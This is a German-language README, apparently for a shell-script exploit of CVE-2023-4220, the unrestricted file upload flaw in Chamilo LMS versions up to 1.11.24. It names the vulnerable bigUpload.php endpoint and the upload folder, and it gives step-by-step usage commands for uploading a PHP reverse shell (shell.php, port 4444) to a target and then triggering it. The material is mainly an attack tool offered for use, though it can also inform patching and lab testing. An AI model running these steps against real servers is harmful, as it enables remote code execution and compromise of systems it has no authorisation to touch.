
Shell-basierter Exploit für CVE-2023-4220, der auf uneingeschränkte Dateiuploads in Chamilo LMS abzielt. Lädt beliebige Dateien hoch, um auf anfälligen Instanzen Reverse Shells auszuführen.
Dieses Exploit demonstriert eine Schwachstelle in Bezug auf uneingeschränktes Datei-Upload in Chamilo-LMS. Die Schwachstelle betrifft die Big-File-Upload-Funktionalität unter:
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
Betroffene Versionen: Chamilo LMS <= v1.11.24
Die Schwachstelle erlaubt das Hochladen beliebiger Dateien nach:
/main/inc/lib/javascript/bigupload/files/
Zuerst das Exploit ausführbar machen und die Nutzungsinformationen anzeigen:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
Führen Sie das Exploit mit den erforderlichen Parametern aus:
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
Überprüfen Sie die hochgeladene Datei unter:
http://target.test/main/inc/lib/javascript/bigupload/files/
-f: Datei zum Hochladen angeben-h: Ziel-Host-URL-p: Portnummer für die Verbindung./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
Die Schwachstelle besteht im Datei-Upload-Mechanismus von Chamilo LMS, der hochgeladene Dateien in der Big-File-Upload-Funktionalität nicht ordnungsgemäß validiert.
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/